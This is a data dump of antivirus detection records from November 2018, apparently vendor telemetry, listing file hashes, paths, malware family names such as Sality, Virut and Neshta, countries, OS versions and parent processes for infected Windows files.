  Row(detection=Row(filename='a0a8ff1bb49fc13b45aaf1734cca406807f4c6b0cf7370750580a69c7ad2a7f5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\A0A8FF1BB49FC13B45AAF1734CCA406807F4C6B0CF7370750580A69C7AD2A7F5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a0a8ff1bb49fc13b45aaf1734cca406807f4c6b0cf7370750580a69c7ad2a7f5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0cba91030d6a094d7548e44972b4e4375857b07e9b744adf071b540b79e597b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-17\\A0CBA91030D6A094D7548E44972B4E4375857B07E9B744ADF071B540B79E597B', filesize=1600000, name='ADWARE/MultiPlug.Gen7.#M300.#R601903'), hash='a0cba91030d6a094d7548e44972b4e4375857b07e9b744adf071b540b79e597b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vc_redist.x86.exe', filepath='C:\\ProgramData\\Package Cache\\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}\\VC_redist.x86.exe', filesize=580000, name='W32/Jeefo.A.#M1.#R1'), hash='a0d3d94a34a990441a66d26bdce8c3489703308a43461a7eebd42ba90b3956cd', metadata=Row(cmdline='--engine=2 --session-id=8YsoEh9XPV4LLlyuyfzuOr+VsXK2bOIfuptUHBMo --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=13449336, timestamp='2018-11-01T19:09:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vc_redist.x86.exe', filepath='C:\\ProgramData\\Package Cache\\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}\\VC_redist.x86.exe', filesize=580000, name='W32/Jeefo.A.#M1.#R1'), hash='a0d3d94a34a990441a66d26bdce8c3489703308a43461a7eebd42ba90b3956cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:45:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vc_redist.x86.exe', filepath='C:\\ProgramData\\Package Cache\\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}\\VC_redist.x86.exe', filesize=580000, name='W32/Jeefo.A.#M1.#R1'), hash='a0d3d94a34a990441a66d26bdce8c3489703308a43461a7eebd42ba90b3956cd', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Lsj5Z1BTu0u5hzcw.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T17:37:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ut9tl4ek.exe', filepath='C:\\New folder\\برامج مكافحة للفيروسات\\ut9tl4ek.exe', filesize=384000, name='HEUR/AGEN.1000498.#M1.#R1'), hash='a146cfe85e2301113fd71b2c667234a314bd021295f358d9bc414274f40c7928', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T21:59:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ut9tl4ek.exe', filepath='C:\\New folder\\برامج مكافحة للفيروسات\\ut9tl4ek.exe', filesize=384000, name='HEUR/AGEN.1000498.#M1.#R1'), hash='a146cfe85e2301113fd71b2c667234a314bd021295f358d9bc414274f40c7928', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T21:59:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ut9tl4ek.exe', filepath='C:\\New folder\\برامج مكافحة للفيروسات\\ut9tl4ek.exe', filesize=384000, name='HEUR/AGEN.1000498.#M1.#R1'), hash='a146cfe85e2301113fd71b2c667234a314bd021295f358d9bc414274f40c7928', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T21:59:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='install_virtualdj_home_v7.0.5.exe', filepath='\\\\?\\I:\\files\\soft\\install_virtualdj_home_v7.0.5.exe', filesize=36608000, name='TR/Patched.Gen.#M300.#R2947'), hash='a17436293e6f1d060337bfc5cf947019d393cbcb86063b116a058b0722a98925', metadata=Row(cmdline=None, country='KE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:35:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='install_virtualdj_home_v7.0.5.exe', filepath='I:\\files\\soft\\install_virtualdj_home_v7.0.5.exe', filesize=36608000, name='TR/Patched.Gen.#M300.#R2947'), hash='a17436293e6f1d060337bfc5cf947019d393cbcb86063b116a058b0722a98925', metadata=Row(cmdline=None, country='KE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T12:31:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mpstd.exe', filepath='\\\\?\\H:\\12.) DESHA_ITD\\5.) chao_mylo\\DRIVER PACK FOR ALL\\Drivers\\Audio\\REALTEK\\XP64_MCE_XP_2K_ME_98(A380)\\Ap\\Mpstd.exe', filesize=3904000, name='W32/Viking.AT.#M1.#R1'), hash='a1c01dc447e868681b0977bd8708f10e5b09963f6aaa45a0f315f68dddbd50ae', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:52:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='passmarkkeyboardtest.exe', filepath='K:\\HBCD\\Programs\\PASSMARKKEYBOARDTEST.EXE', filesize=64000, name='TR/Agent.gpono.#M1.#R1'), hash='a226c44141c53061f71957bc34dbfface47bd10230578a172e45e5b267b295b6', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190523-f3a10aa3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190523-F3A10AA3', filesize=64000, name='TR/Agent.gpono.#M1.#R1'), hash='a226c44141c53061f71957bc34dbfface47bd10230578a172e45e5b267b295b6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a23ef7e9000c4f57a594d3c282c6c755db0866e3b3155145ad98515a2d131e00', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A23EF7E9000C4F57A594D3C282C6C755DB0866E3B3155145AD98515A2D131E00', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a23ef7e9000c4f57a594d3c282c6c755db0866e3b3155145ad98515a2d131e00', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a2493556f627f0ef0f49c27d469ad8e11a95bcabb5b5964eb11ea2b9d80f2f59', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_29.10.2018-30.categorizing\\A2493556F627F0EF0F49C27D469AD8E11A95BCABB5B5964EB11EA2B9D80F2F59', filesize=512000, name='TR/Patched.Ren.Gen.#M300.#R3290'), hash='a2493556f627f0ef0f49c27d469ad8e11a95bcabb5b5964eb11ea2b9d80f2f59', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:20:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmbservicemailsender.exe', filepath='\\\\?\\E:\\Program Files (x86)\\Sony\\PMB\\PMBServiceMailSender.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='a2ee6cec323e6222acd777528779cff0251cf7101afcc967ec7ab8c709bb810e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:52:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmbservicemailsender.exe', filepath='\\\\?\\E:\\Program Files (x86)\\Sony\\PMB\\PMBServiceMailSender.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='a2ee6cec323e6222acd777528779cff0251cf7101afcc967ec7ab8c709bb810e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:58:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmbservicemailsender.exe', filepath='E:\\Program Files (x86)\\Sony\\PMB\\PMBServiceMailSender.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='a2ee6cec323e6222acd777528779cff0251cf7101afcc967ec7ab8c709bb810e', metadata=Row(cmdline='-m:aeinv.dll -f:UpdateSoftwareInventoryW', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T03:50:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='samp-server.exe', filepath='C:\\Users\\X\\Desktop\\oLD sTREET\\samp-server.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='a2f3a38e346a138b082cab0efcf162ac24e47c14ac55c660a3f4fe4e9060af48', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:6JpW\\\\\\/4PDdk6mbr1g.1', country='BA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=126264, timestamp='2018-11-01T14:43:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='samp-server.exe', filepath='C:\\Users\\X\\Desktop\\oLD sTREET\\samp-server.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='a2f3a38e346a138b082cab0efcf162ac24e47c14ac55c660a3f4fe4e9060af48', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-01T19:35:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a3744611a64d28953637522ff028896c1bf3a5bae91d856f514fdd26c121097c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\A3744611A64D28953637522FF028896C1BF3A5BAE91D856F514FDD26C121097C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a3744611a64d28953637522ff028896c1bf3a5bae91d856f514fdd26c121097c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='liveupdatelauncher.exe', filepath='C:\\Program Files (x86)\\Avanquest update\\LiveUpdateLauncher.exe', filesize=96000, name='W32/Neshta.A.#M1.#R1'), hash='a3f6f1a158bbc795c73b6df26e16b5582448b68e41de3a3bf5411b16a18fb5fa', metadata=Row(cmdline='\\\\\\/c', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=185672, timestamp='2018-11-01T10:23:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='liveupdatelauncher.exe', filepath='C:\\Program Files (x86)\\Avanquest update\\LiveUpdateLauncher.exe', filesize=96000, name='W32/Neshta.A.#M1.#R1'), hash='a3f6f1a158bbc795c73b6df26e16b5582448b68e41de3a3bf5411b16a18fb5fa', metadata=Row(cmdline='\\\\\\/c', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=185672, timestamp='2018-11-01T10:29:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T05:45:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:31:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T05:40:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T05:58:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T12:18:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:21:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a41f0021e269dc55a28db460807bc14334adb3ee00d942832c42b630ed4db51f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A41F0021E269DC55A28DB460807BC14334ADB3EE00D942832C42B630ED4DB51F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a41f0021e269dc55a28db460807bc14334adb3ee00d942832c42b630ed4db51f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:13:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a464cfca96ded1ffdda173e691e6267d3989466383a09e803f720b37862c254c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A464CFCA96DED1FFDDA173E691E6267D3989466383A09E803F720B37862C254C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a464cfca96ded1ffdda173e691e6267d3989466383a09e803f720b37862c254c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:14:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a47aeae2f0881fbc559f52e025bae72ebf87781ce90d503ab3a2ba47685e6e92', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\A47AEAE2F0881FBC559F52E025BAE72EBF87781CE90D503AB3A2BA47685E6E92', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a47aeae2f0881fbc559f52e025bae72ebf87781ce90d503ab3a2ba47685e6e92', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a48fec91bcba9d171bd1729342e7e51e138474171d3a93dff1765e0c33a3a9be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A48FEC91BCBA9D171BD1729342E7E51E138474171D3A93DFF1765E0C33A3A9BE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a48fec91bcba9d171bd1729342e7e51e138474171d3a93dff1765e0c33a3a9be', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scilexer.dll', filepath='C:\\Program Files\\Adobe\\Adobe Utilities\\ExtendScript Toolkit 2\\SciLexer.dll', filesize=752000, name='W32/Ramnit.C.#M1.#R1'), hash='a49cbd9baa2a5809d79b819039fdb3ff937e7375823b8e90829dadeb71f81433', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T13:22:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX OCT. 2010\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='a4bd6b6eb6b1a6ddcc5083e1de8044516a2e77440b9bf41075e6076314ad5688', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:46:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='تشغيل.exe', filepath='j:\\محمد\\الأنشطة\\الافراح\\برامج\\gta san andrea  saudi\\new folder\\need 4 speed underground\\تشغيل.exe', filesize=3584000, name='W32/Virut.Gen.#M1.#R1'), hash='a4ca4bc82cfb9bc9245677846bb135982008863554863c8189dde63dd080f867', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:43:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a4cdbca9a43dfb941bb8b982caf8aa3d9ddff4d9a4849e6a8b4ed95ba6c1b921.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\A4CDBCA9A43DFB941BB8B982CAF8AA3D9DDFF4D9A4849E6A8B4ED95BA6C1B921.VIR', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='a4cdbca9a43dfb941bb8b982caf8aa3d9ddff4d9a4849e6a8b4ed95ba6c1b921', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T06:55:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='change sped contabil installation.exe', filepath='C:\\Arquivos de Programas RFB\\Programas SPED\\SpedContabil\\SpedContabil_installation\\Change Sped Contabil Installation.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='a4f89cbfb38f2fe3480813d625b0ce165e6d171343b0b01815f3655f4625c9a6', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:32:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a57ad8f6d1c0e5112d307c282ea0763fa12e8fecb6aa64a7ba26d64df767e2b7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A57AD8F6D1C0E5112D307C282EA0763FA12E8FECB6AA64A7BA26D64DF767E2B7', filesize=680000, name='TR/Dropper.Gen.#M300.#R246'), hash='a57ad8f6d1c0e5112d307c282ea0763fa12e8fecb6aa64a7ba26d64df767e2b7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:14:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-083524-66b5a517', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4676877a\\AVSCAN-20181101-083448-5FCD14D4\\AVSCAN-20181101-083524-66B5A517', filesize=20000, name='TR/Agent.40960.AH.#M1.#R1'), hash='a57b4e207d23dc92e5b319a31a9d561bf10d6c61a376e1f028274b22ac92bfd3', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a58b659f922447d16438b55b3f196e8b34d909261912fbae2aff8ea218c08af7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A58B659F922447D16438B55B3F196E8B34D909261912FBAE2AFF8EA218C08AF7', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='a58b659f922447d16438b55b3f196e8b34d909261912fbae2aff8ea218c08af7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:14:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack_pes_2019_32d298d.exe', filepath='F:\\CRACK_PES_2019_32D298D.EXE', filesize=3136000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='a5de74fd8225883fb2e96665365419f20b7594280238b32190618b2705f680e3', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T23:43:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack_pes_2019_32d298d.exe', filepath='F:\\CRACK_PES_2019_32D298D.EXE', filesize=3136000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='a5de74fd8225883fb2e96665365419f20b7594280238b32190618b2705f680e3', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T23:43:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='C:\\Users\\X\\Downloads\\Borland.Delphi.v7.Studio.Enterprise\\Borland.Delphi.v7.Studio.Enterprise\\autorun.exe', filesize=512000, name='BDS/Administratio.A.#M1.#R1'), hash='a64d982204d814633b22e33b5e4ff5221e09b74f81937e7cfa5a6954005f1747', metadata=Row(cmdline='x -iext -ow -ver -- \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Borland.Delphi.v7.Studio.Enterprise\\\\\\\\Borland.Delphi.v7.Studio.Enterprise.iso\\\\\\" C:\\\\\\\\Users\\\\\\\\User\\\\\\\\Downloads\\\\\\\\Borland.Delphi.v7.Studio.Enterprise\\\\\\\\Borland.Delphi.v7.Studio.Enterprise\\\\\\\\', country='LV', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1551248, timestamp='2018-11-01T20:31:33Z'), dt=datetime.date(2018, 11, 1)),
